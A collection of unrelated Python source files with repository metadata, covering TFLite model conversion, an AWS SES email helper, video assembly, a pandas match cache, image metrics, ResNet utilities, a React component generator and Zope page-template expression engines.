callbacks=[model_checkpoint, reduce_lr]
)
model.load_weights(ckp_path)
# converting
converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
# Save the model.
with open('model.tflite', 'wb') as f:
f.write(tflite_model)
prediction_val = model.predict(X_test, batch_size=BATCH_SIZE)
# p@rediction
prediction_val[:20]
Y_test[:20]
def print_hi(name):
# Use a breakpoint in the code line below to debug your script.
print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print_hi('hey am coding using python')
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| Bpdum/face_recogntion_tfModel_android_pycharm | main.py | main.py | py | 3,914 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.style.use",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.style",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.listdir",
... |
73501419235 | import logging
import boto3
class SESService():
def __init__(self):
self.client = boto3.client(
'ses',
aws_access_key_id="INPUT YOUR ACESS KEY FROM AWS",
aws_secret_access_key="INPUT YOUR SECRET ACESS KEY FROM AWS",
region_name="INPUT YOUR REGION",
)
@staticmethod
def __verify_status(*email):
approved_message = 'We are happy to inform you that your application was approved'
rejected_message = 'We regret to inform you that your application was rejected'
application = 'Thank you for applying. We will get back to you as soon as possible!'
status = application
if len(email) > 1 and email[1] == 'Approved':
status = approved_message
elif len(email) > 1 and email[1] == 'Rejected':
status = rejected_message
return status
def send_email(self, *email):
message = self.__verify_status(*email)
response = self.client.send_email(
Source='bignightmare1@gmail.com',
Destination={
'ToAddresses': [
email[0],
],
},
Message={
'Subject': {
'Data': f'Welcome to Interview Management System {email[0]}!',
'Charset': 'UTF-8'
},
'Body': {
'Text': {
'Data': f'{message}',
'Charset': 'UTF-8'
}
}
},
)
logging.info(f'Email sent {response}')
| vmakksimov/IM_System | services/ses.py | ses.py | py | 1,630 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "boto3.client",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 51,
"usage_type": "call"
}
] |
29835250163 | import cv2
from cv2 import VideoWriter_fourcc
import os
import numpy as np
from tqdm import tqdm
import skvideo.io
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='create videos based on images')
parser.add_argument('--img_path', '-in',
help='output result file in pickle format')
parser.add_argument('--video_path', '-out',
help='output result file in pickle format')
args = parser.parse_args()
img_dir = args.img_path # "/mnt/lustre/mig.cla/users/fanglj/projects/detr3d/work_dirs/internal_detr3d_res101_scale05_range75/results_epoch_20/save_figs"
savepath = args.video_path # "/mnt/lustre/mig.cla/users/fanglj/projects/detr3d/work_dirs/internal_detr3d_res101_scale05_range75/results_epoch_20/save_videos/internal_results.mp4"
if not os.path.exists(os.path.split(savepath)[0]):
os.makedirs(os.path.split(savepath)[0], exist_ok=True)
video_fps = 10
video_writer = skvideo.io.FFmpegWriter(
savepath,
inputdict={
'-r':
str(video_fps),
'-s':
'{}x{}'.format(int(1200),
int(800))
},
outputdict={
'-r': str(video_fps),
'-vcodec': 'libx264'
})
img_list = os.listdir(img_dir)
img_list = sorted(img_list)
for name in tqdm(img_list):
image = cv2.imread(os.path.join(img_dir, name))
image = cv2.resize(image, (1200, 800), interpolation=cv2.INTER_NEAREST)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
video_writer.writeFrame(image)
video_writer.close()
| jjw-DL/Code_Analysis | detr4d/internal_code/create_video.py | create_video.py | py | 1,693 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "os.path.split",
... |
74138069153 | import logging
from enum import Enum
from typing import Optional
import pandas as pd
from pandas import DataFrame
import config
from asseeibot import runtime_variables
from asseeibot.models.cache import Cache
from asseeibot.models.fuzzy_match import FuzzyMatch, MatchBasedOn
from asseeibot.models.ontology_dataframe import OntologyDataframeColumn
from asseeibot.models.wikimedia.wikidata.entity import EntityId
logger = logging.getLogger(__name__)
# This code is adapted from https://github.com/dpriskorn/WikidataMLSuggester and LexUtils
# lookups where inspired by
# https://stackoverflow.com/questions/24761133/pandas-check-if-row-exists-with-certain-values
class CacheDataframeColumn(Enum):
QID = "qid"
CROSSREF_SUBJECT = "crossref_subject"
MATCH_BASED_ON = "match_based_on"
SPLIT_SUBJECT = "split_subject"
ORIGINAL_SUBJECT = "original_subject"
class MatchCache(Cache):
"""This models our cache of matches"""
crossref_subject_found: bool = None
dataframe: DataFrame = None
qid_dropped: bool = None
qid_found: bool = None
pickle: str = config.cache_pickle_filename
class Config:
# Because of DataFrame
arbitrary_types_allowed = True
def __check_variables__(self):
logger.debug("Checking variables")
if self.match.qid is None:
raise ValueError("match.qid was None")
if self.match.original_subject is None:
raise ValueError("match.original_subject was None")
if self.match.crossref_subject is None:
raise ValueError("match.crossref_subject was None")
if self.match.split_subject is None:
raise ValueError("match.split_subject was None")
if self.match.match_based_on is None:
raise ValueError("match.match_based_on was None")
def __append_new_match_to_the_dataframe__(self):
self.__check_variables__()
logger.debug("Adding to cache")
data = {
CacheDataframeColumn.QID.value: self.match.qid.value,
CacheDataframeColumn.CROSSREF_SUBJECT.value: self.match.crossref_subject,
CacheDataframeColumn.MATCH_BASED_ON.value: self.match.match_based_on.value,
CacheDataframeColumn.ORIGINAL_SUBJECT.value: self.match.original_subject,
CacheDataframeColumn.SPLIT_SUBJECT.value: self.match.split_subject,
}
if self.dataframe is None:
self.dataframe = pd.DataFrame(data=[data])
else:
self.dataframe = self.dataframe.append(pd.DataFrame(data=[data]))
def __check_crossref_subject__(self):
if self.match.crossref_subject is None:
raise ValueError("crossref_subject was None")
if self.match.crossref_subject == "":
raise ValueError("crossref_subject was empty string")
def __check_qid__(self):
if self.match.qid is None:
raise ValueError("qid was None")
def __check_if_drop_was_successful__(self):
if config.loglevel == logging.DEBUG:
logging.debug("Checking if the qid is still in the cache")
match = (self.dataframe[CacheDataframeColumn.QID.value] == self.match.qid.value).any()
logger.debug(f"match:{match}")
print(self.dataframe.info())
logger.debug(f"Saving pickle without {self.match.qid.value}")
def __drop_qid_from_dataframe__(self):
self.__read_dataframe_from_disk__()
# This tests whether any row matches
match = (self.dataframe[CacheDataframeColumn.QID.value] == self.match.qid.value).any()
logger.debug(f"match:{match}")
if match:
logger.debug("Deleting the item from the cache now")
self.dataframe = self.dataframe[self.dataframe[CacheDataframeColumn.QID.value] != self.match.qid.value]
self.qid_dropped = True
else:
self.qid_dropped = False
def __extract_match__(self):
"""Here we find the row that matches and extract the
result column and extract the value using any()
"""
logger.info("Extracting match from cache")
found_match = self.dataframe.loc[
self.dataframe[CacheDataframeColumn.CROSSREF_SUBJECT.value] == self.match.crossref_subject].any()
logger.debug(f"result:{found_match}")
if found_match is not None:
logger.info("Already matched QID found in the cache")
row: DataFrame = self.dataframe[
self.dataframe[CacheDataframeColumn.CROSSREF_SUBJECT.value] == self.match.crossref_subject
]
if isinstance(row, DataFrame):
# print(row)
# print(row[CacheDataframeColumn.QID.value].values[0])
# exit()
qid: EntityId = EntityId(row[CacheDataframeColumn.QID.value][0])
original_subject: str = row[CacheDataframeColumn.ORIGINAL_SUBJECT.value][0]
crossref_subject: str = row[CacheDataframeColumn.ORIGINAL_SUBJECT.value][0]
match_based_on = MatchBasedOn(row[CacheDataframeColumn.MATCH_BASED_ON.value][0])
split_subject: bool = bool(row[CacheDataframeColumn.SPLIT_SUBJECT.value][0])
ontology_dataframe = runtime_variables.ontology_dataframe
label = ontology_dataframe.loc[
ontology_dataframe[OntologyDataframeColumn.ITEM.value] == qid.url(),
OntologyDataframeColumn.LABEL.value].head(1).values[0]
description = ontology_dataframe.loc[
ontology_dataframe[OntologyDataframeColumn.ITEM.value] == qid.url(),
OntologyDataframeColumn.DESCRIPTION.value].head(1).values[0]
alias = ontology_dataframe.loc[
ontology_dataframe[OntologyDataframeColumn.ITEM.value] == qid.url(),
OntologyDataframeColumn.ALIAS.value].head(1).values[0]
if label is None:
raise ValueError("label was None")
self.match = FuzzyMatch(
qid=qid,
original_subject=original_subject,
match_based_on=match_based_on,
split_subject=split_subject,
crossref_subject=crossref_subject,
alias=alias,
label=label,
description=description,
)
# print(self.match)
# exit()
else:
logger.error("Did not get pandas dataframe, got")
print(row)
exit()
def __lookup_crossref_subject__(self):
if len(self.dataframe) > 0:
match = (self.dataframe[CacheDataframeColumn.CROSSREF_SUBJECT.value] == self.match.crossref_subject).any()
logger.debug(f"match:{match}")
self.crossref_subject_found = match
else:
self.crossref_subject_found = False
def __lookup_qid__(self):
match = (self.dataframe[CacheDataframeColumn.QID.value] == self.match.qid.value).any()
logger.debug(f"match:{match}")
self.qid_found = match
def read(self) -> Optional[FuzzyMatch]:
"""Returns None or result from the cache"""
self.__check_crossref_subject__()
self.__verify_that_the_cache_file_exists_and_read__()
self.__lookup_crossref_subject__()
if self.crossref_subject_found:
self.__extract_match__()
return self.match
def add(self) -> bool:
"""Add a match to the cache
It returns True if it was added and False if either QID
or the crossref subject was found in the cache.
:return: bool"""
self.__check_crossref_subject__()
self.__check_qid__()
self.__verify_that_the_cache_file_exists_and_read__()
self.__lookup_crossref_subject__()
if not self.crossref_subject_found and not self.qid_found:
self.__append_new_match_to_the_dataframe__()
self.__save_dataframe_to_disk__()
return True
else:
return False
def delete(self) -> bool:
"""Delete from the cache.
Returns True if success and False if not found"""
self.__check_qid__()
logger.debug("Deleting from the cache")
self.__verify_that_the_cache_file_exists_and_read__()
self.__drop_qid_from_dataframe__()
if self.qid_dropped:
self.__save_dataframe_to_disk__()
return True
else:
return False
| dpriskorn/asseeibot | asseeibot/models/match_cache.py | match_cache.py | py | 8,581 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "enum.Enum",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "asseeibot.models.cache.Cache",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "pandas.DataF... |
73934613795 | import numpy as np
import cv2
import nibabel as nib
import os
import yaml
from pytorch_fid import fid_score
#from pytorch_lightning import metrics
import argparse
parser = argparse.ArgumentParser(description='Metrics Script')
parser.add_argument('--bodymask_path', type=str)
parser.add_argument('--real_slices_path', type=str)
parser.add_argument('--fake_slices_path', type=str)
parser.add_argument('--results_path', type=str, default='./metrics_result.yaml')
parser.add_argument('--FID', action='store_true')
parser.add_argument('--debug_images', action='store_true')
args = parser.parse_args()
def build_volume(slices, patient):
# build 3D volume w*h*d
names_slices = slices.keys()
filtered_slice_keys =[s for s in names_slices if (s[:4] == patient)]
filtered_slice_keys.sort()
volume_dimensions = (slices[filtered_slice_keys[0]].shape[0], slices[filtered_slice_keys[0]].shape[0], len(filtered_slice_keys))
volume = np.zeros(volume_dimensions)
for i, sl in enumerate(filtered_slice_keys):
if len(slices[sl].shape) == 2:
volume[:,:,i] = slices[sl]
else:
volume[:,:,i] = slices[sl][:,:,0]
return volume
def read_slices(path):
# assume folder is for one patient
filelist = os.listdir(path)
imglist = {}
for f in filelist:
if f[-4:] == '.png':
imglist[f] = cv2.imread(os.path.join(path, f))
elif f[-4:] == '.nii':
A_img_nifti = nib.load(os.path.join(path, f))
imglist[f] = A_img_nifti.get_fdata(caching = "unchanged").astype(np.int16)
#print(imglist[f][0,0])
else:
print(f + ' does not fit specified input')
return imglist
def rescale_slices(slices):
for key in slices:
slices[key] = 4095*slices[key] -1024
return slices
def read_mask(path):
# assume folder is for one patient
filelist = os.listdir(path)
imglist = {}
for f in filelist:
A_img_nifti = nib.load(os.path.join(path, f))
imglist[f] = A_img_nifti.get_fdata(caching = "unchanged")
return imglist
def mask_volume(volume, mask):
return np.multiply(volume, mask)
if __name__ == "__main__":
bodymask_path = args.bodymask_path
real_slices_path = args.real_slices_path
fake_slices_path = args.fake_slices_path
results_path = args.results_path
print('reading real slices from: '+ real_slices_path)
real_slices = read_slices(real_slices_path)
print('reading fake slices from: '+ fake_slices_path)
fake_slices = read_slices(fake_slices_path)
print('rescaling fake slices')
mask_slices = read_slices(bodymask_path)
results = {}
results['real_path'] = real_slices_path
results['fake_path'] = fake_slices_path
results['masks_path'] = bodymask_path
# patient list with registered data, this needs to be changed if more
# or other registered training data is available. The all the files with the
# filename beginning with one of the list elements are considered.
pat = ['PAT1', 'PAT3']
diff_all_pat = []
for p in pat:
# make volumes
print(p)
real_vol = build_volume(real_slices, p)
fake_vol = build_volume(fake_slices, p)
mask = build_volume(mask_slices, p)
# mask volumes
fake_vol = mask_volume(fake_vol, mask)
real_vol = mask_volume(real_vol, mask)
diff = real_vol - fake_vol
diff_masked = diff[mask>0]
diff_all_pat.append(diff_masked)
# calculate MAE
mae = (np.abs(diff_masked)).mean()
sd_ae = np.std(np.abs(diff_masked))
print(p + ' MAE: '+ str(mae) + ', SD: '+ str(sd_ae))
# calculate MSE
mse = ((diff_masked)**2).mean()
sd_se = np.std((diff_masked)**2)
print(p + ' MSE: '+ str(mse) + ', SD: '+ str(sd_se))
# calculate ME
me = diff_masked.mean()
sd_e = np.std(diff_masked)
print(p + ' ME: '+ str(me)+ ', SD: '+ str(sd_e))
# calculate MRSE
mrse = np.sqrt(mse)
print(p + ' MRSE: '+ str(mrse))
# add to dict
results[p] = {
'mse': float(mse), 'sd_mse': float(sd_se),
'mae': float(mae), 'sd_mae': float(sd_ae),
'me': float(me), 'sd_me': float(sd_e)}
# calculations for all patients
p = 'PAT1+PAT3'
# calculate MAE
diff_all_pat = np.concatenate(diff_all_pat)
# calculate MAE
mae = (np.abs(diff_all_pat)).mean()
sd_ae = np.std(np.abs(diff_all_pat))
print(p + ' MAE: '+ str(mae) + ', SD: '+ str(sd_ae))
# calculate MSE
mse = ((diff_all_pat)**2).mean()
sd_se = np.std((diff_all_pat)**2)
print(p + ' MSE: '+ str(mse) + ', SD: '+ str(sd_se))
# calculate ME
me = diff_all_pat.mean()
sd_e = np.std(diff_all_pat)
print(p + ' ME: '+ str(me)+ ', SD: '+ str(sd_e))
results[p] = {
'mse': float(mse), 'sd_mse': float(sd_se),
'mae': float(mae), 'sd_mae': float(sd_ae),
'me': float(me), 'sd_me': float(sd_e)}
print('FID Calculations: ' + str(args.FID))
if args.FID:
print('Calculating FID score, this may take a while...')
fid_paths = [real_slices_path,fake_slices_path]
fid_value = fid_score.calculate_fid_given_paths(fid_paths,
batch_size=50,
device=None,
dims=2048)
results['FID'] = float(fid_value)
with open(results_path, 'w') as file:
documents = yaml.dump(results, file)
print(results)
if args.debug_images:
def on_change(i):
img = np.hstack(((real_vol[:,:,i]+1024)/4095, (fake_vol[:,:,i]+1024)/4095, mask[:,:,i]))
cv2.imshow('real-fake-mask', img)
img = np.hstack(((real_vol[:,:,0]+1024)/4095, (fake_vol[:,:,0]+1024)/4095, mask[:,:,0]))
cv2.imshow('real-fake-mask', img)
cv2.createTrackbar('slider', 'real-fake-mask', 0, 299, on_change)
while True:
k = cv2.waitKey(0)
if k==27: # Esc key to stop
cv2.destroyAllWindows()
break
| deltahue/DL-Project-2020 | contrastive-unpaired-translation-master/evaluate_metrics.py | evaluate_metrics.py | py | 6,275 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line... |
23167904841 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import tensorflow as tf
import tensorflow.contrib.slim as slim
class Block(namedtuple('Block', ['scope', 'unit_fn', 'args'])):
"""A named tuple describing a ResNet block.
Its parts are:
scope: The scope of the `Block`.
unit_fn: The ResNet unit function which takes as input a `Tensor` and returns another `Tensor` with the output of the ResNet unit.
args: A list of length equal to the number of units in the `Block`. The list contains one (depth, depth_bottleneck, stride) tuple for each unit in the block to serve as argument to unit_fn.
"""
def subsample(inputs, factor, scope=None):
if factor == 1:
return inputs
else:
return slim.max_pool2d(inputs, [1, 1], stride=factor, scope=scope) # padding='VALID'
def conv2d_same(inputs, num_outputs, kernel_size, stride, rate=1, scope=None):
if stride == 1:
return slim.conv2d(inputs, num_outputs, kernel_size, stride=1, rate=rate, padding='SAME', scope=scope)
else:
kernel_size_effective = kernel_size+(kernel_size-1)*(rate-1)
pad_total = kernel_size_effective-1
pad_beg = pad_total//2
pad_end = pad_total-pad_beg
inputs = tf.pad(inputs, [[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]]) # zero padding
return slim.conv2d(inputs, num_outputs, kernel_size, stride=stride, rate=rate, padding='VALID', scope=scope)
@slim.add_arg_scope
def stack_blocks_dense(net, blocks, output_stride=None, store_non_strided_activations=False, outputs_collections=None):
current_stride = 1
rate = 1
for block in blocks:
with tf.variable_scope(block.scope, 'block', [net]) as sc:
block_stride = 1
for i, unit in enumerate(block.args):
if store_non_strided_activations and i == len(block.args)-1:
block_stride = unit.get('stride', 1)
unit = dict(unit, stride=1)
with tf.variable_scope('unit_%d' % (i+1), values=[net]):
if output_stride is not None and current_stride == output_stride:
net = block.unit_fn(net, rate=rate, **dict(unit, stride=1))
rate *= unit.get('stride', 1)
else:
net = block.unit_fn(net, rate=1, **unit)
current_stride *= unit.get('stride', 1)
if output_stride is not None and current_stride > output_stride:
raise ValueError('The target output_stride cannot be reached.')
net = slim.utils.collect_named_outputs(outputs_collections, sc.name, net)
if output_stride is not None and current_stride == output_stride:
rate *= block_stride
else:
net = subsample(net, block_stride)
current_stride *= block_stride
if output_stride is not None and current_stride > output_stride:
raise ValueError('The target output_stride cannot be reached.')
if output_stride is not None and current_stride != output_stride:
raise ValueError('The target output_stride cannot be reached.')
return net
def resnet_arg_scope(weight_decay=0.0001,
batch_norm_decay=0.9,
batch_norm_epsilon=2e-5,
batch_norm_scale=True,
activation_fn=tf.nn.leaky_relu,
use_batch_norm=True,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'updates_collections': batch_norm_updates_collections,
'fused': None, # Use fused batch norm if possible.
'param_regularizers': {'gamma': slim.l2_regularizer(weight_decay)},
}
with slim.arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(weight_decay),
weights_initializer=tf.contrib.layers.xavier_initializer(uniform=False),
activation_fn=activation_fn,
normalizer_fn=slim.batch_norm if use_batch_norm else None,
normalizer_params=batch_norm_params):
with slim.arg_scope([slim.batch_norm], **batch_norm_params):
with slim.arg_scope([slim.max_pool2d], padding='SAME') as arg_sc:
return arg_sc | luckycallor/InsightFace-tensorflow | backbones/utils.py | utils.py | py | 4,551 | python | en | code | 246 | github-code | 1 | [
{
"api_name": "collections.namedtuple",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tensorflow.contrib.slim.max_pool2d",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "tensorflow.contrib.slim",
"line_number": 25,
"usage_type": "name"
},
{
... |
21923155762 | #!/usr/bin/python
import json
import os
import sys
config = sys.argv[-1]
# load json content from config file
def load_json():
with open(config) as components:
return json.load(components)
json = load_json()
# helper function for creating folders
def create_folder(folder_name,prev = None):
if prev is None:
new_folder_path = os.path.join(os.getcwd(),folder_name)
if not os.path.exists(new_folder_path):
os.mkdir(new_folder_path)
return new_folder_path
new_folder_pathh = os.path.join(prev,folder_name)
if not os.path.exists(new_folder_pathh):
os.mkdir(new_folder_pathh)
# create all the respective subfolders folders specified for each component
def create_directories():
parent = create_folder(json['path'])
for component in json['components']:
create_folder(component,parent)
path = create_directories()
# react code template
code_template = """// libraries
import React from "react"
// other components
// style
// utils
const {} = () => {{
return (
<div>This is the {} component</div>
);
}};
export default {};"""
# create javascript files in respective folders
# fill each file with code template
def create_js():
for component in json['components']:
filename = component.capitalize() + ".js"
full_file_path = os.path.join("components",component,filename)
with open(full_file_path,"w") as file:
file.write(code_template.format(component.capitalize(),component,component.capitalize()))
create_js()
| faddalibrahim/scripts-and-utils | Python/react_component_generator/create.py | create.py | py | 1,563 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
... |
704734527 | __docformat__ = 'restructuredtext'
import sys
from zope import component
from zope.interface import implements
from zope.component.interfaces import ComponentLookupError
from zope.traversing.interfaces import IPathAdapter, ITraversable
from zope.traversing.interfaces import TraversalError
from zope.traversing.adapters import traversePathElement
from zope.security.untrustedpython import rcompile
from zope.security.proxy import ProxyFactory, removeSecurityProxy
from zope.security.untrustedpython.builtins import SafeBuiltins
from zope.i18n import translate
from zope.tales.expressions import PathExpr, StringExpr, NotExpr, DeferExpr
from zope.tales.expressions import SimpleModuleImporter
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import ExpressionEngine, Context
from i18n import ZopeMessageFactory as _
class InlineCodeError(Exception):
pass
class ZopeTraverser(object):
def __init__(self, proxify=None):
if proxify is None:
self.proxify = lambda x: x
else:
self.proxify = proxify
def __call__(self, object, path_items, econtext):
"""Traverses a sequence of names, first trying attributes then items.
"""
request = getattr(econtext, 'request', None)
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
# special-case dicts for performance reasons
if getattr(object, '__class__', None) == dict:
object = object[name]
else:
object = traversePathElement(object, name, path_items,
request=request)
object = self.proxify(object)
return object
zopeTraverser = ZopeTraverser(ProxyFactory)
class ZopePathExpr(PathExpr):
def __init__(self, name, expr, engine):
super(ZopePathExpr, self).__init__(name, expr, engine, zopeTraverser)
trustedZopeTraverser = ZopeTraverser()
class TrustedZopePathExpr(PathExpr):
def __init__(self, name, expr, engine):
super(TrustedZopePathExpr, self).__init__(name, expr, engine,
trustedZopeTraverser)
# Create a version of the restricted built-ins that uses a safe
# version of getattr() that wraps values in security proxies where
# appropriate:
class ZopePythonExpr(PythonExpr):
def __call__(self, econtext):
__traceback_info__ = self.text
vars = self._bind_used_names(econtext, SafeBuiltins)
return eval(self._code, vars)
def _compile(self, text, filename):
return rcompile.compile(text, filename, 'eval')
class ZopeContextBase(Context):
"""Base class for both trusted and untrusted evaluation contexts."""
def translate(self, msgid, domain=None, mapping=None, default=None):
return translate(msgid, domain, mapping,
context=self.request, default=default)
evaluateInlineCode = False
def evaluateCode(self, lang, code):
if not self.evaluateInlineCode:
raise InlineCodeError(
_('Inline Code Evaluation is deactivated, which means that '
'you cannot have inline code snippets in your Page '
'Template. Activate Inline Code Evaluation and try again.'))
# TODO This is only needed when self.evaluateInlineCode is true,
# so should only be needed for zope.app.pythonpage.
from zope.app.interpreter.interfaces import IInterpreter
interpreter = component.queryUtility(IInterpreter, lang)
if interpreter is None:
error = _('No interpreter named "${lang_name}" was found.',
mapping={'lang_name': lang})
raise InlineCodeError(error)
globals = self.vars.copy()
result = interpreter.evaluateRawCode(code, globals)
# Add possibly new global variables.
old_names = self.vars.keys()
for name, value in globals.items():
if name not in old_names:
self.setGlobal(name, value)
return result
class ZopeContext(ZopeContextBase):
"""Evaluation context for untrusted programs."""
def evaluateMacro(self, expr):
"""evaluateMacro gets security-proxied macro programs when this
is run with the zopeTraverser, and in other untrusted
situations. This will cause evaluation to fail in
zope.tal.talinterpreter, which knows nothing of security proxies.
Therefore, this method removes any proxy from the evaluated
expression.
>>> output = [('version', 'xxx'), ('mode', 'html'), ('other', 'things')]
>>> def expression(context):
... return ProxyFactory(output)
...
>>> zc = ZopeContext(ExpressionEngine, {})
>>> out = zc.evaluateMacro(expression)
>>> type(out)
<type 'list'>
The method does some trivial checking to make sure we are getting
back a macro like we expect: it must be a sequence of sequences, in
which the first sequence must start with 'version', and the second
must start with 'mode'.
>>> del output[0]
>>> zc.evaluateMacro(expression) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ('unexpected result from macro evaluation.', ...)
>>> del output[:]
>>> zc.evaluateMacro(expression) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ('unexpected result from macro evaluation.', ...)
>>> output = None
>>> zc.evaluateMacro(expression) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ('unexpected result from macro evaluation.', ...)
"""
macro = removeSecurityProxy(Context.evaluateMacro(self, expr))
# we'll do some basic checks that it is the sort of thing we expect
problem = False
try:
problem = macro[0][0] != 'version' or macro[1][0] != 'mode'
except (TypeError, IndexError):
problem = True
if problem:
raise ValueError('unexpected result from macro evaluation.', macro)
return macro
def setContext(self, name, value):
# Hook to allow subclasses to do things like adding security proxies
Context.setContext(self, name, ProxyFactory(value))
class TrustedZopeContext(ZopeContextBase):
"""Evaluation context for trusted programs."""
class AdapterNamespaces(object):
"""Simulate tales function namespaces with adapter lookup.
When we are asked for a namespace, we return an object that
actually computes an adapter when called:
To demonstrate this, we need to register an adapter:
>>> from zope.component.testing import setUp, tearDown
>>> setUp()
>>> from zope.component import provideAdapter
>>> def adapter1(ob):
... return 1
>>> adapter1.__component_adapts__ = (None,)
>>> provideAdapter(adapter1, None, IPathAdapter, 'a1')
Now, with this adapter in place, we can try out the namespaces:
>>> ob = object()
>>> namespaces = AdapterNamespaces()
>>> namespace = namespaces['a1']
>>> namespace(ob)
1
>>> namespace = namespaces['a2']
>>> namespace(ob)
Traceback (most recent call last):
...
KeyError: 'a2'
Cleanup:
>>> tearDown()
"""
def __init__(self):
self.namespaces = {}
def __getitem__(self, name):
namespace = self.namespaces.get(name)
if namespace is None:
def namespace(object):
try:
return component.getAdapter(object, IPathAdapter, name)
except ComponentLookupError:
raise KeyError(name)
self.namespaces[name] = namespace
return namespace
class ZopeBaseEngine(ExpressionEngine):
_create_context = ZopeContext
def __init__(self):
ExpressionEngine.__init__(self)
self.namespaces = AdapterNamespaces()
def getContext(self, __namespace=None, **namespace):
if __namespace:
if namespace:
namespace.update(__namespace)
else:
namespace = __namespace
context = self._create_context(self, namespace)
# Put request into context so path traversal can find it
if 'request' in namespace:
context.request = namespace['request']
# Put context into context so path traversal can find it
if 'context' in namespace:
context.context = namespace['context']
return context
class ZopeEngine(ZopeBaseEngine):
"""Untrusted expression engine.
This engine does not allow modules to be imported; only modules
already available may be accessed::
>>> modname = 'zope.pagetemplate.tests.trusted'
>>> engine = _Engine()
>>> context = engine.getContext(engine.getBaseNames())
>>> modname in sys.modules
False
>>> context.evaluate('modules/' + modname)
Traceback (most recent call last):
...
KeyError: 'zope.pagetemplate.tests.trusted'
(The use of ``KeyError`` is an unfortunate implementation detail; I
think this should be a ``TraversalError``.)
Modules which have already been imported by trusted code are
available, wrapped in security proxies::
>>> m = context.evaluate('modules/sys')
>>> m.__name__
'sys'
>>> m._getframe
Traceback (most recent call last):
...
ForbiddenAttribute: ('_getframe', <module 'sys' (built-in)>)
The results of Python expressions evaluated by this engine are
wrapped in security proxies::
>>> r = context.evaluate('python: {12: object()}.values')
>>> type(r)
<type 'zope.security._proxy._Proxy'>
>>> r = context.evaluate('python: {12: object()}.values()[0].__class__')
>>> type(r)
<type 'zope.security._proxy._Proxy'>
General path expressions provide objects that are wrapped in
security proxies as well::
>>> from zope.component.testing import setUp, tearDown
>>> from zope.security.checker import NamesChecker, defineChecker
>>> class Container(dict):
... implements(ITraversable)
... def traverse(self, name, further_path):
... return self[name]
>>> setUp()
>>> defineChecker(Container, NamesChecker(['traverse']))
>>> d = engine.getBaseNames()
>>> foo = Container()
>>> foo.__name__ = 'foo'
>>> d['foo'] = ProxyFactory(foo)
>>> foo['bar'] = bar = Container()
>>> bar.__name__ = 'bar'
>>> bar.__parent__ = foo
>>> bar['baz'] = baz = Container()
>>> baz.__name__ = 'baz'
>>> baz.__parent__ = bar
>>> context = engine.getContext(d)
>>> o1 = context.evaluate('foo/bar')
>>> o1.__name__
'bar'
>>> type(o1)
<type 'zope.security._proxy._Proxy'>
>>> o2 = context.evaluate('foo/bar/baz')
>>> o2.__name__
'baz'
>>> type(o2)
<type 'zope.security._proxy._Proxy'>
>>> o3 = o2.__parent__
>>> type(o3)
<type 'zope.security._proxy._Proxy'>
>>> o1 == o3
True
>>> o1 is o2
False
Note that this engine special-cases dicts during path traversal:
it traverses only to their items, but not to their attributes
(e.g. methods on dicts), because of performance reasons:
>>> d = engine.getBaseNames()
>>> d['adict'] = {'items': 123}
>>> d['anotherdict'] = {}
>>> context = engine.getContext(d)
>>> context.evaluate('adict/items')
123
>>> context.evaluate('anotherdict/keys')
Traceback (most recent call last):
...
KeyError: 'keys'
>>> tearDown()
"""
def getFunctionNamespace(self, namespacename):
""" Returns the function namespace """
return ProxyFactory(
super(ZopeEngine, self).getFunctionNamespace(namespacename))
class TrustedZopeEngine(ZopeBaseEngine):
"""Trusted expression engine.
This engine allows modules to be imported::
>>> modname = 'zope.pagetemplate.tests.trusted'
>>> engine = _TrustedEngine()
>>> context = engine.getContext(engine.getBaseNames())
>>> modname in sys.modules
False
>>> m = context.evaluate('modules/' + modname)
>>> m.__name__ == modname
True
>>> modname in sys.modules
True
Since this is trusted code, we can look at whatever is in the
module, not just __name__ or what's declared in a security
assertion::
>>> m.x
42
Clean up after ourselves::
>>> del sys.modules[modname]
"""
_create_context = TrustedZopeContext
class TraversableModuleImporter(SimpleModuleImporter):
implements(ITraversable)
